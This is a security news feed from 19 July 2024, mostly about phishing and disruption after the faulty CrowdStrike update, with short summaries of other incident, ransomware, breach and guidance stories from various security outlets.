Within hours of mass IT outages on Friday, a surge of new domains began appearing online, all sharing one common factor: the name CrowdStrike. As the company grapples with a global tech outage that has delayed flights and disrupted emergency services, opportunistic cybercriminals are quick to exploit the chaos. Numerous websites have surfaced, promising help to those affected by the outage. Names like crowdstriketoken[.]com, crowdstrikedown[.]site and crowdstrikefix[.]com were identified by a UK-based cybersecurity researcher specializing in credential phishing. These new domains were registered and designed in record time to lure in people desperate to restore their systems. While phishing sites commonly emerge following major events, the scale of Friday’s outages presents a vast field of potential victims. According to the researcher, several sites were still under construction, including crowdstrike-helpdesk[.]com and crowdstrikeclaim[.]com. Bloomberg reported that he began monitoring the situation around midday in the UK and discovered new domains registered as early as 4:12 a.m. EDT, totaling 28 sites so far.

NOTE: the fix is to boot into the Windows “safe mode,” delete the offending file—called C-00000291*.sys—and reboot. Microsoft says 8.5 million devices were impacted; that number represents less than 1% of Windows devices worldwide.

The US Cybersecurity and Infrastructure Security Agency (CISA) has already observed threat actors exploiting this incident for phishing and other malicious activities. They urge people to avoid clicking on suspicious links.

George Kurtz, CEO of CrowdStrike, said: "Nothing is more important to me than the trust and confidence that our customers and partners have put into CrowdStrike. As we resolve this incident, you have my commitment to provide full transparency on how this occurred and steps we’re taking to prevent anything like this from happening again." I know George and I'm sure that CrowdStrike will survive this. But it sure is a massive headache for customers.

He said: "We know that adversaries and bad actors will try to exploit events like this. I encourage everyone to remain vigilant and ensure that you’re engaging with official CrowdStrike representatives. Our blog and technical support will continue to be the official channels for the latest updates." Exactly. Warn your users to not get lured onto a scam site and download a fake update.

FULL DISCLOSURE: It is exceedingly rare that I buy individual stocks, but I bought CRWD "on the dip".

by KnowBe4

2024-07-19 19:36:42

CrowdStrike update at center of Windows “Blue Screen of Death” outage

An enormous IT outage across the world today is not the result of a cyberattack, but rather a faulty update from CrowdStrike.

by Malwarebytes Labs

2024-07-19 19:08:39

CrowdStrike security update leads to widespread outages

A CrowdStrike security update has left thousands of organizations unable to boot their Windows computers.

by ThreatDown

2024-07-19 18:59:48

CrowdStrike’s rivals stand to benefit from its update fail debacle

CrowdStrike competes with a number of vendors, including SentinelOne and Palo Alto Networks but also Microsoft, Trellix, Trend Micro and Sophos, in the endpoint security market. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-19 18:44:23

IT services provider for UK’s NHS chooses Barracuda for cloud data protection

It’s hard to think of a customer with a more acute need for an advanced, scalable, cloud-based backup solution than The Health Informatics Service, or THIS.

by Barracuda

2024-07-19 18:08:00

Faulty CrowdStrike Update Crashes Windows Systems, Impacting Businesses Worldwide

Businesses across the world have been hit by widespread disruptions to their Windows workstations stemming from a faulty update pushed out by cybersecurity company CrowdStrike. "CrowdStrike is actively working with customers impacted by a defect found in a single content update for Windows hosts," the company's CEO George Kurtz said in a statement. "Mac and Linux hosts are not impacted. This is

by The Hacker News

2024-07-19 18:00:00

Two Russian Nationals Plead Guilty in LockBit Ransomware Attacks

Two Russian nationals have pleaded guilty in a U.S. court for their participation as affiliates in the LockBit ransomware scheme and helping facilitate ransomware attacks across the world. The defendants include Ruslan Magomedovich Astamirov, 21, of Chechen Republic, and Mikhail Vasiliev, 34, a dual Canadian and Russian national of Bradford, Ontario. Astamirov was arrested in Arizona by U.S. law

by The Hacker News

2024-07-19 17:58:12

Number of data breach victims goes up 1,000%

The Identity Theft Resource Center has published a report showing a 1,170% increase in compromised data victims compared to the same quarter last year.

by Malwarebytes Labs

2024-07-19 17:53:14

78% of Organizations Are Targets of Ransomware Attacks Two or More Times in Twelve Months

New data puts the spotlight on the frequency and impact of modern ransomware attacks, highlighting the overconfidence organizations are showing in their ability to defend and respond to attacks.

by KnowBe4

2024-07-19 17:52:49

CISA’s Red Team Exercise Shows Value of Phishing, but Misses the Best Recommendation

Phishing is used to completely compromise the victim’s environment after other repeated methods failed.

by KnowBe4

2024-07-19 17:31:13

The CrowdStrike outage is a plot point in a rom-com

There’s a man in Florida right now who wants to propose to his girlfriend while they’re on a beach vacation. He couldn’t get the engagement ring before he flew down from New England, but it didn’t seem like that big of an issue — his girlfriend’s daughter Nicole was planning to join them in Florida […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-19 17:25:00

What we know about CrowdStrike’s update fail that’s causing global outages and travel chaos

Here's everything you need to know so far about the global outages caused by CrowdStrike's buggy software update. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-19 17:03:43

The Critical Role of Supply Chain Resilience in Today’s Digital Landscape

Businesses must recognize that operational resilience extends beyond cybersecurity; it encompasses the entire supply chain, ensuring that even routine updates do not disrupt operations. The post The Critical Role of Supply Chain Resilience in Today’s Digital Landscape appeared first on Zimperium.

by Zimperium

2024-07-19 16:57:52

Buggy CrowdStrike EDR Update Crashes Windows Systems Worldwide

Though the cybersecurity vendor has since reverted the update, chaos continues as companies continue to struggle to get back up and running.

by Dark Reading

2024-07-19 16:30:00

Safeguard Personal and Corporate Identities with Identity Intelligence

Learn about critical threats that can impact your organization and the bad actors behind them from Cybersixgill’s threat experts. Each story shines a light on underground activities, the threat actors involved, and why you should care, along with what you can do to mitigate risk.  In the current cyber threat landscape, the protection of personal and corporate identities has become vital.

by The Hacker News

2024-07-19 15:42:42

Tech Giants Agree to Standardize AI Security

The Coalition for Secure AI is a consortium of influential AI companies aiming to develop tools to secure AI applications and set up an ecosystem for sharing best practices.

by Dark Reading

2024-07-19 15:28:48

From the Sphere to false cyberattack claims, misinformation runs rampant amid CrowdStrike outage

This serves as an example for how easy it is to spread inaccurate information online during a time of immense global confusion and panic. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-19 15:28:22

Notorious Chinese Hacker Gang GhostEmperor Re-Emerges After 2 Years

After an extended period underground, the Chinese hackers have added a more sophisticated infection chain and additional EDR evasion techniques.

by Dark Reading

2024-07-19 15:26:44

Worldwide IT Outages: Cybersecurity Experts Weigh In

Today (19th July 2024), outages have been reported across almost every facet of society, from airlines and airports, supermarkets and banking to communication services, NHS and trains. EDR org Crowdstrike said the problem was caused by “a defect found in a single content update for Windows hosts”. Whilst the company have confirmed that it was […] The post Worldwide IT Outages: Cybersecurity Experts Weigh In first appeared on IT Security Guru.

by IT Security Guru

2024-07-19 15:12:43

California Is a Battleground for AI Bills, as Trump Plans To Curb Regulation

With the GOP pledging free rein for the new technology and action in Congress stalled, Sacramento is pushing plans to put guardrails on AI.

by ITPro Today

2024-07-19 15:07:04

Exploring Internet traffic during the 2024 U.S. Republican National Convention

This week, the Republican National Convention was hosted in Milwaukee, Wisconsin from July 15 to 18, 2024. We examined traffic shifts and cyberattacks since June 2024 to see how these events have impacted the Internet

by Cloudflare

2024-07-19 14:59:00

Pro-Houthi Group Targets Yemen Aid Organizations with Android Spyware

A suspected pro-Houthi threat group targeted at least three humanitarian organizations in Yemen with Android spyware designed to harvest sensitive information. These attacks, attributed to an activity cluster codenamed OilAlpha, entail a new set of malicious mobile apps that come with their own supporting infrastructure, Recorded Future's Insikt Group said. Targets of the ongoing campaign

by The Hacker News

2024-07-19 14:57:58

How Utilities and Telcos Are Rationalizing Their Clouds

Forrester's latest report highlights how these linear asset-intensive industries, although relatively late to public cloud, are now eagerly pursuing its potential.

by ITPro Today

2024-07-19 14:54:16

Global outage of Microsoft clients due to CrowdStrike update | Kaspersky official blog

The CrowdStrike EDR driver update has affected airports, banks and stores around the world.

by Kaspersky

2024-07-19 14:46:19

How One Bad CrowdStrike Update Crashed the World’s Computers

A defective CrowdStrike update sent computers around the globe into a reboot death spiral, taking down air travel, hospitals, banks, and more with it. Here’s how that’s possible.

by WIRED Security News

2024-07-19 14:30:00

DHS Inspector General: Coast Guard Shortcomings Hinder US Maritime Security

Private sector organizations are "hesitant" to seek guidance from the Coast Guard, which isn't sufficiently equipped to help them yet.

by Dark Reading

2024-07-19 14:24:27

Global Microsoft Meltdown Tied to Bad Crowdstrike Update

A faulty software update from cybersecurity vendor Crowdstrike crippled countless Microsoft Windows computers across the globe today, disrupting everything from airline travel and financial institutions to hospitals and businesses online. Crowdstrike said a fix has been deployed, but experts say the recovery from this outage could take some time, as Crowdstrike's solution needs to be applied manually on a per-machine basis.

by Krebs on Security

2024-07-19 14:03:38

Google Cloud Ups the Ante on VMware Workload Migration

The hyperscaler said it is offering a cost-effective and flexible way to support VMware cloud workloads.

by ITPro Today

2024-07-19 14:01:47

Trustwave Rapid Response: CrowdStrike Falcon Outage Update

Trustwave is proactively assessing and monitoring our clients who may have been impacted by CrowdStrike’s recently rolled-out update for its Windows users. The critical issue identified with CrowdStrike Falcon may result in a Blue Screen of Death (BSOD) on Windows systems, affecting systems worldwide in the travel, healthcare, finance, and telecommunications firms, according to published reports. 

by SpiderLabs Blog

2024-07-19 14:00:00

In Cybersecurity, Mitigating Human Risk Goes Far Beyond Training

As threat actors get smarter about how they target employees, the onus is on organizations to create a strong line of defense — and the human element is a critical component.

by Dark Reading

2024-07-19 14:00:00

China's APT41 Targets Global Logistics, Utilities Companies

According to Mandiant, among the many cyber espionage tools the threat actor is using is a sophisticated new dropper called DustTrap.

by Dark Reading

2024-07-19 13:00:00

Ransomware Has Outsized Impact on Gas, Energy & Utility Firms

Attackers are more likely to target critical infrastructure industries and, when they do, they cause more disruption and ask higher ransoms, with the median payment topping $2.5 million.

by Dark Reading

2024-07-19 12:54:00

APT41 Infiltrates Networks in Italy, Spain, Taiwan, Turkey, and the U.K.

Several organizations operating within global shipping and logistics, media and entertainment, technology, and automotive sectors in Italy, Spain, Taiwan, Thailand, Turkey, and the U.K. have become the target of a "sustained campaign" by the prolific China-based APT41 hacking group. "APT41 successfully infiltrated and maintained prolonged, unauthorized access to numerous victims' networks since

by The Hacker News

2024-07-19 12:50:00

Summary of "AI Leaders Spill Their Secrets" Webinar

Event Overview: The "AI Leaders Spill Their Secrets" webinar, hosted by Sigma Computing, featured prominent AI experts sharing their experiences and strategies for success in the AI industry. The panel included Michael Ward from Sardine, Damon Bryan from Hyperfinity, and Stephen Hillian from Astronomer, moderated by Zalak Trivedi, Sigma Computing's Product Manager. Key Speakers and Their

by The Hacker News

2024-07-19 12:43:00

SolarWinds Patches 8 Critical Flaws in Access Rights Manager Software

SolarWinds has addressed a set of critical security flaws impacting its Access Rights Manager (ARM) software that could be exploited to access sensitive information or execute arbitrary code. Of the 13 vulnerabilities, eight are rated Critical in severity and carry a CVSS score of 9.6 out of 10.0. The remaining five weaknesses have been rated High in severity, with four of them having a CVSS

by The Hacker News

2024-07-19 11:23:37

CrowdStrike Update Halts the Systems: CyberSpace Ripple Effect

1. CrowdStrike Windows Outage: What Happened? A recent CrowdStrike update caused severe disruptions, including high CPU usage on macOS systems and the Blue Screen of Death (BSOD) on Windows systems. These issues affected hundreds of systems globally, leading to operational standstills in various sectors, including broadcasting, aviation, and transportation. 2. When Did the Disruption Occur? The […] The post CrowdStrike Update Halts the Systems: CyberSpace Ripple Effect appeared first on ThreatMon Blog.

by ThreatMon

2024-07-19 11:20:00

Tenable Customer Update about CrowdStrike Incident

Please read this important customer update about CrowdStrike's recent incident.

Saturday, July 20, 2024
As of 5:45 am ET this morning, we have implemented a fix for the CrowdStrike incident and are monitoring to ensure it resolved all associated issues.

Friday, July 19, 2024, 12:21 pm ET Update
Following the recent CrowdStrike update, we are aware that some of our Tenable Identity Exposure customer platforms on Microsoft Azure have been affected. The incident does not prevent users from accessing their console and reviewing the results of the previous scan. Only the real-time monitoring is impacted. Similarly, new Identity Exposure data in Tenable One is not available. We are working to quickly restore this service and will publish updates on our dedicated incident web portal. In the meantime, we can confirm that all of our other Tenable solutions are not impacted and working as they should.

Friday, July 19, 2024, 10:15 am ET
Following the recent CrowdStrike update, we are aware that some of our Tenable Identity Exposure customer platforms on Microsoft Azure have been affected. The incident does not prevent users from accessing their console and reviewing the results of the previous scan. Only the real-time monitoring is impacted. Similarly, Identity Exposure data in Tenable One is not available. We are working to quickly restore this service and will publish updates on our dedicated incident web portal. In the meantime, we can confirm that all of our other Tenable solutions are not impacted and working as they should.

by Tenable

2024-07-19 11:00:00

Master IT Compliance: Key Standards and Risks Explained

The job of an IT professional extends beyond technology to include navigating complex and evolving regulatory requirements.

by ITPro Today

2024-07-19 10:17:40

Extraordinary IT Outage Hobbles Business Around the Globe

A cybersecurity vendor’s threat-monitoring product is causing Microsoft’s Windows operating system to crash.

by ITPro Today

2024-07-19 10:05:37

CrowdStrike software update at the root of a massive global IT outage

A defective software update led to major disruptions in aviation, banking and other industries as Microsoft 365 services were impacted worldwide.

by Cybersecurity Dive

2024-07-19 09:37:00

WazirX Cryptocurrency Exchange Loses $230 Million in Major Security Breach

Indian cryptocurrency exchange WazirX has confirmed that it was the target of a security breach that led to the theft of $230 million in cryptocurrency assets. "A cyber attack occurred in one of our [multi-signature] wallets involving a loss of funds exceeding $230 million," the company said in a statement. "This wallet was operated utilizing the services of Liminal's digital asset custody and

by The Hacker News

2024-07-19 09:04:00

Healthcare is an ‘easy victim’ for ransomware attacks. How hospitals can mitigate the damage.

Limited resources in a highly connected ecosystem can make hospitals vulnerable, but planning ahead and implementing key protections could help thwart attacks.

by Cybersecurity Dive

2024-07-19 09:00:00

Cybersecurity Snapshot: CISA Breaks Into Agency, Outlines Weak Spots in Report, as Cloud Security Alliance Updates Cloud Sec Guidance

CISA’s red team acted like a nation-state attacker in its assessment of a federal agency’s cybersecurity. Plus, the Cloud Security Alliance has given its cloud security guidance a major revamping. Meanwhile, a Google report puts a spotlight on insecure credentials. And the latest on open source security, CIS Benchmarks and much more!

Dive into six things that are top of mind for the week ending July 19.

1 - CISA’s red team breaches fed agency, details lessons learned

A new, must-read report from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) outlines how the agency’s red team probed a large federal agency’s network, quickly found a way in and stayed undetected for months.

The 29-page report details the so-called SilentShield assessment from CISA’s red team, explains what the agency’s security team should have done differently and offers concrete recommendations and best practices you might find worth reviewing.

Mimicking the modus operandi of a typical nation-state attacker, CISA’s red team exploited a known vulnerability on an unpatched web server, gaining access to the agency’s Solaris environment. Separately, the red team also breached the network’s Windows environment via a phishing attack. Once inside, the red team was able to exploit other weaknesses, such as unsecured admin credentials, to extend the scope of the breach, which went undetected for five months. At that point, CISA alerted the agency about the SilentShield operation.

CISA has authorization to conduct SilentShield assessments, whose purpose is to work with the impacted agency and help its security team strengthen its cyberdefenses.

Here’s a brief sampling of the assessed agency’s security weaknesses:
- Lack of sufficient prevention and detection controls, including an inadequate firewall between its perimeter and internal networks, and insufficient network segmentation
- Failure to effectively collect, retain and analyze logs, which hampered defensive analysts’ ability to gather necessary information
- Bureaucratic processes and siloed teams
- Reliance on flagging “known” indicators of compromise (IOCs) instead of using behavior-based detection
- Lack of familiarity with the identity and access management system (IAM), which wasn’t tested against credential-manipulation techniques, nor were its anomalous-behavior alerts monitored

Recommendations include:
- Deploy internal and external firewalls
- Implement strong network segmentation
- Enroll all accounts in the IAM system, and make sure it’s not vulnerable to credential manipulation
- Centralize logging and use tool-agnostic detection

To get more details, read the report, titled “CISA Red Team’s Operations Against a Federal Civilian Executive Branch Organization Highlights the Necessity of Defense-in-Depth.”

For more information about the threat from nation-state cyberattackers:
- “What CISOs Need to Know About Nation-State Actors” (InformationWeek)
- “4 Ways to Defend Against Nation-State Attacks” (BankInfoSecurity)
- “Growing Nation-State Alliances Increase U.S. Cyber Risks” (Government Technology)
- “Nation-State Hackers Leverage Zero-Day Vulnerabilities to Penetrate MITRE Cybersecurity Research Network” (CPO Magazine)

2 - Cloud Security Alliance’s cloud sec guide gets revamped

The Cloud Security Alliance (CSA) has given a major makeover to its “Security Guidance for Critical Areas of Focus in Cloud Computing,” including adding new topics like artificial intelligence (AI), and boosting coverage of areas like data security and IAM.

The guide is aimed at helping organizations understand cloud computing components and cloud security best practices. Version 5, released this week, replaces version 4, which was published in 2017.

“We have completely revamped this updated 5th version to align with modern technologies and challenges,” reads the CSA blog “New Cloud Security Guidance from CSA.”

Here’s some of what’s new:
- Increased coverage of cloud workloads, application security, CI/CD, data security and DevSecOps
- New topics such as AI and zero trust
- Less emphasis on laws and regulations

The guide is organized into 12 sections, including:
- Cloud computing concepts and architectures
- Cloud governance and strategies
- Risk, audit and compliance
- IAM
- Cloud workload security
- Data security

For more information about cloud security, check out these Tenable resources:
- “Tag, You’re IT! Tagging Your Way to Cloud Security Excellence” (blog)
- “Leveraging CIEM to Secure Cloud Identities and Entitlements at Scale” (on-demand webinar)
- “Understanding Customer Managed Encryption Keys in AWS, Azure and GCP” (blog)
- “Secure Your Cloud-Native Applications” (on-demand webinar)
- “Cloud Workload Protection: The Key to Decreasing Cloud Security Risks” (blog)

3 - Google: Credential gaps top initial-access vectors for cloud breaches

When it comes to gaining an initial foothold in a cloud environment, attackers’ best friends are weak or simply non-existent credentials. That’s according to the latest “Google Cloud Threat Horizons Report,” which is based on data gathered during the first half of 2024.

Specifically, weak or no credentials accounted for 47.2% of initial-access vectors in cloud compromises observed by Google Cloud in customer environments. (Source: Google Cloud Threat Horizons Report, July 2024)

Meanwhile, using the compromised system for cryptomining ranked as attackers’ top intrusion motivation (58.8%). (Source: Google Cloud Threat Horizons Report, July 2024)

For more information about identity and access management security:
- “Poor Identity Hygiene at Root of Nation-State Attack Against Microsoft” (Tenable)
- “What is identity and access management? Guide to IAM” (TechTarget)
- “What is IAM? Identity and access management explained” (CSO)
- “Multifactor Authentication Is Not Enough to Protect Cloud Data” (Dark Reading)

4 - CISA working on OSS security framework, assessment tool

As part of its efforts to help improve the security of open source software (OSS), CISA is crafting a framework and backing the development of an automated tool for assessing whether an OSS component is trustworthy.

“As work on both the framework and supporting tools continue to progress, we will improve our capability to assess OSS trustworthiness at scale,” reads CISA’s blog “Continued Progress Towards a Secure Open Source Ecosystem.”

The assessment framework will evaluate four aspects of the development of an OSS component:
- Its project, including the number of active contributors and unexpected ownership changes
- The product, including whether it contains known vulnerabilities or outdated dependencies
- Its protections, such as whether developer accounts require MFA
- Its policies, such as requirements for code reviews and vulnerability disclosures

“Taken together, the collected measurements can be grouped into these four categories to provide software users and choosers a consistent way to evaluate the trustworthiness of a particular OSS component,” wrote blog author Aeva Black, CISA’s Section Chief of Open Source Software Security.

To automate the framework’s measurement process and combine the measurement results, CISA is funding the development of an open source tool called Hipcheck, which is designed to “automatically assess and score software repositories for supply chain risk,” according to its GitHub page.

For more information about open source software security:
- “Establishing a security baseline for open source projects” (Help Net Security)
- “OWASP Top 10 Risks for Open Source Software” (OWASP)
- “Create an open source security policy for your organization” (TechTarget)
- “How to Navigate Open-Source Security Without Stifling Innovation” (Infosecurity)
- “Study finds that SW developers lack cybersecurity skills” (Tenable)

5 - Banks get guidance on secure cloud adoption

Banks and other financial services institutions looking for fresh guidance on adopting cloud securely can check out new best-practices documents published this week.

The documents, published by the U.S. Treasury Department and the Financial Services Sector Coordinating Council (FSSCC) industry non-profit group, seek to accomplish goals such as:
- Establishing a common cloud-computing terminology for banks and regulators
- Crafting best practices for reducing cloud-related third-party risk
- Improving transparency and monitoring of cloud services
- Creating a framework for cloud services adoption

“Today’s publications mark a significant step forward by providing a roadmap and helpful resources for banks of all sizes,” Acting Comptroller of the Currency Michael J. Hsu said in a statement. “These documents also clarify cloud service providers’ responsibilities for ensuring a secure and resilient financial system.”

To get more details, check out the Treasury’s announcement “Treasury and the Financial Services Sector Coordinating Council Publish New Resources on Effective Practices for Secure Cloud Adoption.”

For more information about cybersecurity in the financial sector:
- “The cyber clock is ticking: Derisking emerging technologies in financial services” (McKinsey)
- “A Cyber Defense Guide for the Financial Sector” (Center for Internet Security)
- “4 steps to secure your treasury operations from cyberattacks” (J.P. Morgan)
- “Global financial stability at risk due to cyber threats” (World Economic Forum)
- “The rise of cyberattacks on financial institutions highlights the need to build a security culture” (SC Magazine)

6 - CIS updates Benchmarks for Apple, Google, Red Hat products

Apple’s macOS. Microsoft’s Windows Server. Red Hat’s Enterprise Linux. Google’s Kubernetes Engine. Those are among the products included in the latest round of updates for the popular CIS Benchmarks from the Center for Internet Security.

Specifically, these secure-configuration recommendations were updated in June:
- CIS AlmaLinux OS 9 Benchmark v2.0.0
- CIS Apple macOS 12.0 Monterey Benchmark v3.1.0
- CIS Apple macOS 13.0 Ventura Benchmark v2.1.0
- CIS Apple macOS 14.0 Sonoma Benchmark v1.1.0
- CIS Google Kubernetes Engine (GKE) Benchmark v1.6.0
- CIS Microsoft Windows Server 2019 Stand-alone Benchmark v2.0.0
- CIS NGINX Benchmark v2.1.0
- CIS Oracle Linux 9 Benchmark v2.0.0
- CIS Red Hat Enterprise Linux 9 Benchmark v2.0.0
- CIS Red Hat OpenShift Container Platform Benchmark v1.6.0
- CIS Rocky Linux 9 Benchmark v2.0.0

In addition, CIS released brand new Benchmarks for AWS storage services, including Amazon Simple Storage Service (S3), and for Microsoft Azure database services, including Azure SQL.

Organizations can use the CIS Benchmarks’ secure-configuration guidelines to harden products against attacks. Currently, there are more than 100 Benchmarks for 25-plus vendor product families. Categories include cloud platforms; databases; desktop and server software; mobile devices; operating systems; and more.

To get more details, read the CIS blog “CIS Benchmarks July 2024 Update.” For more information about the CIS Benchmarks list, check out its home page, as well as:
- “Getting to Know the CIS Benchmarks” (CIS)
- “Security Via Consensus: Developing the CIS Benchmarks” (Dark Reading)
- “How to Unlock the Security Benefits of the CIS Benchmarks” (Tenable)
- “CIS Benchmarks Communities: Where configurations meet consensus” (Help Net Security)
- “CIS Benchmarks: DevOps Guide to Hardening the Cloud” (DevOps)

by Tenable

2024-07-19 08:40:01

Huge Microsoft Outage Linked to CrowdStrike Takes Down Computers Around the World

A software update from cybersecurity company CrowdStrike appears to have inadvertently disrupted IT systems globally.

by WIRED Security News

2024-07-19 07:58:25

Security News You Can Use—Issue 16

Welcome to the next edition of Forcepoint Security News—curated news meant to provide a quick look at what's happening around the cybersecurity industry. In this issue, Google, OpenAI, Microsoft, Amazon, Nvidia and other big names in AI band together as the Coalition for Secure AI (CoSAI), Tag-100 hackers turn to open-source tools, FIN7 hackers sell anti Endpoint Detection & Response...

by Forcepoint Blog

2024-07-18 22:33:53

CISA Publishes Resiliency Playbook for Critical Infrastructure

The manual provides guidance on how to improve the resiliency of critical infrastructure.

by Dark Reading

2024-07-18 22:30:33

CSA Updates Cloud Security Certificate, Training

The latest version of the Cloud Security Alliance's certification provides a comprehensive catalog of essential skills that cybersecurity professionals need to master.

by Dark Reading

2024-07-18 21:43:20

Sizable Chunk of SEC Charges Against SolarWinds Tossed Out of Court

Judge dismisses claims against SolarWinds for actions taken after its systems had been breached, but allows the case to proceed for alleged misstatements prior to the incident.

by Dark Reading

2024-07-18 21:41:51

Researcher finds flaw in a16z website that exposed some company data

Venture capital giant a16z fixed a security vulnerability in one of the firm's websites after being warned by a security researcher.

by TechCrunch

2024-07-18 21:13:10

Why Microsoft? Why?

A vulnerability in IE (yes! IE!) has been used for over a year as a zero-day to plant infostealers on Windows machines.

by ThreatDown

2024-07-18 21:04:59

US Data Breach Victim Numbers Increase by 1,000%, Literally

Though the number of victims has risen, the actual number of breaches has gone down, as fewer, bigger breaches affect more individuals.

by Dark Reading

2024-07-18 20:31:00

Cybersecurity Threat Advisory: Emergence of Eldorado RaaS

A new ransomware-as-a-service (RaaS), known as Eldorado, recently emerged, introducing locker variants for both VMware ESXi and Windows systems.

by Barracuda

2024-07-18 20:12:11

Breaking the cyber kill chain with AI

The cyber kill chain framework helps companies defend against all stages of cyberattack. This post examines the framework and how artificial intelligence integrates into each stage.

by Barracuda

2024-07-18 20:07:37

Get patching! Old vCenter vulnerability actively abused

CISA has added a two-year-old vulnerability in vCenter to its catalog of known exploited vulnerabilities

by ThreatDown